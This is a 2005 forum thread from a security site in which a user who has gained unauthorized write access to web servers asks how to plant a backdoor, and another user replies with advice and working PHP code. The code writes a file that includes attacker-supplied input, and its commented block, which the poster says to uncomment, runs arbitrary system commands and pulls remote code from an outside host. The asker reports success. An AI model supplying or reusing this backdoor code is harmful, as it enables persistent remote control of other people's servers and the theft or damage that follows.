 |
|
 |
 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| | |
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9144
 People Online:
 Visitors: 106
 Members: 0
 Total: 106
|
|
|
|
|
|
Full disclosure |
|
CyberDanube Security Research 20251014-0 | Multiple Vulnerabilities in Phoenix Contact QUINT4 UPS
apis.google.com - Insecure redirect via __lu parameter(exploited in the wild)
Urgent Security Vulnerabilities Discovered in Mercku Routers Model M6a
Re: Security Advisory: Multiple High-Severity Vulnerabilities in Suno.com (JWT Leakage, IDOR, DoS)
Security Advisory: Multiple High-Severity Vulnerabilities in Suno.com (JWT Leakage, IDOR, DoS)
[SBA-ADV-20250730-01] CVE-2025-39664: Checkmk Path Traversal
[SBA-ADV-20250724-01] CVE-2025-32919: Checkmk Agent Privilege Escalation via Insecure Temporary Files
CVE-2025-59397 - Open Web Analytics SQL Injection
Re: [FD]Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Re: Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Re: Defense in depth -- the Microsoft way (part 93): SRP/SAFERwhitelisting goes black on Windows 11
Re: [FD]: "Glass Cage" – Zero-Click iMessage ? Persistent iOS Compromise + Bricking (CVE-2025-24085 / 24201, CNVD-2025-07885)
Re: [FD]Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Samtools v1.22.1 Uncontrolled Memory Allocation from Large BED Intervals Causes Denial-of-Service in Samtools/HTSlib
Samtools v1.22.1 Improper Handling of Excessive Histogram Bin Counts in Samtools Coverage Leads to Stack Overflow
|
|
|
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
simple upload script |
|
 Posted: Tue Jan 11, 2005 9:10 pm |
 |
|
| Injector |
| Active user |
 |
|
| Joined: Dec 29, 2004 |
| Posts: 49 |
|
|
|
 |
|
 |
|
I got full access on the server but i still need help I dont really know much about shell coding. I can basically write to any page ther is on all the websites inside the server but what i want to do is to plant a backdoor. I tried planting Remview.php but everytime I use the "WGET" command to include something it doesnt copy the whole php code but instead it copies the page, even with the freewebhosts adverts on it  .
I have write access but my write access is abit dull. I do commands like "injector=cd www/adsdasdas/dasdsad/; echo here at home > somefile.html;ls -l"
What i do wanna do is to write something like a whole code or so not just a line of plain text. How do i do such? how do i do something like "<br>" or something like that?
If anyone has got some ideas please do tell me thanks
Can anyone give me some direction please. Thanks |
|
|
|
|
|
|
|
|
| Posted: Tue Jan 11, 2005 11:06 pm |
|
|
| ReFleX |
| Active user |
|
|
| Joined: Nov 05, 2004 |
| Posts: 39 |
| Location: ARGENTINA! |
|
|
|
|
|
|
OK, if you wnat to upload files you can use WGET but remember to put your files in a web server where theres no PHP parser or insted change the extension to .txt use wget to upload it and then use mv to change the name and extension.
If you get access to server with remote file inclusion you can include a php script that creates a file and put what you what inside. I post a code here of a php script that creates a file
| Code: |
<?
$fd = fopen ("/var/www/html-up/tmp/inc_ceb9579d51fe3697cfa0d2b5fd5a5724_2.php", "w");
$codigo = '<? @include($_GET["a"]; ?>';
/*
$codigo = '<?';
$codigo .= "\n" . '$w = $_GET[w];';
$codigo .= "\n" . '$a = $_GET["a"];';
$codigo .= "\n" . 'if ($w == "a") { ';
$codigo .= "\n" . 'system($a);';
$codigo .= "\n" . '}';
$codigo .= "\n" . 'else if ($w == "b") {';
$codigo .= "\n" . 'include("http://www.geocities.com/" . $a);';
$codigo .= "\n" . '}';
$codigo .= "\n" . 'else {';
$codigo .= "\n" . 'include($a);';
$codigo .= "\n" . '}';
$codigo .= "\n" . '?>';
*/
//echo $codigo;
fwrite($fd, $codigo);
fclose ($fd);
?>
|
in /var/www/html-up/tmp/inc_ceb9579d51fe3697cfa0d2b5fd5a5724_2.php goes the script you want to create (filename)
hope this help! |
|
|
|
|
|
|
|
|
| Posted: Tue Jan 11, 2005 11:11 pm |
|
|
| ReFleX |
| Active user |
|
|
| Joined: Nov 05, 2004 |
| Posts: 39 |
| Location: ARGENTINA! |
|
|
|
|
|
|
remember to get out the comment tags.... the var $codigo is all commented.... /* */
  |
|
|
|
|
| Posted: Wed Jan 12, 2005 6:26 am |
|
|
| Injector |
| Active user |
|
|
| Joined: Dec 29, 2004 |
| Posts: 49 |
|
|
|
|
|
|
|
| thanks Reflex. Everything's solved |
|
|
|
|
| Posted: Wed Jan 12, 2005 12:53 pm |
|
|
| ReFleX |
| Active user |
|
|
| Joined: Nov 05, 2004 |
| Posts: 39 |
| Location: ARGENTINA! |
|
|
|
|
|
|
 ok!! dont be a bad guy hahaha  |
|
|
|
|
www.waraxe.us Forum Index -> Remote file inclusion
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|
